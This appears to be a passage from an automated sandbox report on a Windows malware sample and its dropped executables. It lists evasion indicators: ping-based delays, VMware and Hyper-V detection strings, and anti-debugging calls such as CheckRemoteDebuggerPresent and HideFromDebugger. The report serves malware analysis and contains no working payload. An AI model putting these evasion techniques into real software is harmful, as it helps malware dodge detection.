Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1607186572092.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1607186588295.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100202D0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04F05AA0
Uses ping.exe to sleepShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04F05AA0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100202D0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe TID: 5536Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe TID: 5604Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe TID: 4744Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe TID: 3748Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe TID: 3748Thread sleep time: -62000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe TID: 5688Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeFile opened: PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100223C0 GetLocalTime followed by cmp: cmp ecx, 01h and CTI: jl 10022474h
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100223C0 GetLocalTime followed by cmp: cmp edx, 08h and CTI: jnle 10022474h
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E660F62 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E651C23 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0121A534 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0123A928 FindFirstFileExA,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0122B820 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_00402D09 FindFirstFileA,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_0040693B DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_004066CC FindFirstFileA,FindClose,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026DC704 PathFileExistsW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026E1F70 FindFirstFileW,FindClose,@_RTC_CheckStackVars@8,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04FA7950 PathFileExistsA,_memset,_memset,_strcpy_s,_strcat_s,FindFirstFileA,_memset,_strcpy_s,_strcat_s,_strcat_s,_strcat_s,_strcat_s,PathFileExistsA,PathRemoveFileSpecA,_memset,_strlen,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04FA5A90 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0122DBC8 VirtualQuery,GetSystemInfo,
Source: 1E1C360C582DF797.exe, 00000015.00000003.563174149.0000000005D84000.00000004.00000001.sdmpBinary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI
Source: 1E1C360C582DF797.exe, 00000015.00000003.552028868.0000000005D11000.00000004.00000001.sdmpBinary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 1E1C360C582DF797.exe, 00000015.00000003.551853011.0000000005D84000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueue
Source: 1E1C360C582DF797.exe, 00000015.00000003.549908726.0000000005D11000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 1E1C360C582DF797.exe, 00000015.00000003.551758159.0000000005D57000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.652027273.00000000041F0000.00000004.00000001.sdmpBinary or memory string: Microsoft Hyper-V Generation Counter
Source: 1E1C360C582DF797.exe, 00000015.00000003.551758159.0000000005D57000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.652027273.00000000041F0000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 1E1C360C582DF797.exe, 00000019.00000002.650414355.000000000019B000.00000004.00000010.sdmpBinary or memory string: VMware Virtual disk 2.0
Source: 1E1C360C582DF797.exe, 00000019.00000002.650414355.000000000019B000.00000004.00000010.sdmpBinary or memory string: VMware
Source: 1E1C360C582DF797.exe, 00000015.00000003.549962480.000000000415C000.00000004.00000001.sdmpBinary or memory string: Microsoft Hyper-V Generation Counter ID
Source: 1E1C360C582DF797.exe, 00000015.00000003.551997697.0000000005D36000.00000004.00000001.sdmpBinary or memory string: SystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueue
Source: C:\Users\user\AppData\Roaming\1607186572092.exeProcess information queried: ProcessInformation

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)Show sources
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent,
Hides threads from debuggersShow sources
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeThread information set: HideFromDebugger
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeProcess queried: DebugObjectHandle
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeProcess queried: DebugFlags
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E6652CE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E65041D OutputDebugStringA,GetLastError,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E672571 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E6780EB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_01237363 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_00404C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019DE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019E13 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019E13 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E631660 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,CloseHandle,GetProcessHeap,HeapFree,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe' -s
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E65FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E6652CE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0122EEB3 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0122F07B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_012384EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0122ED65 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_0040825D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026EBE0B SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026EBDF7 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04E83315 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04E86CE8 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04E88D22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeMemory allocated: page read and write | page guard
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeProcess created: C:\Program Files (x86)\71eza90awf48\aliens.exe 'C:\Program Files (x86)\71eza90awf48\aliens.exe'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1001A0F0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError,
Source: 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmpBinary or memory string: Progman
Source: 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0122EBBB cpuid
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: GetLocaleInfoW,GetNumberFormatW,
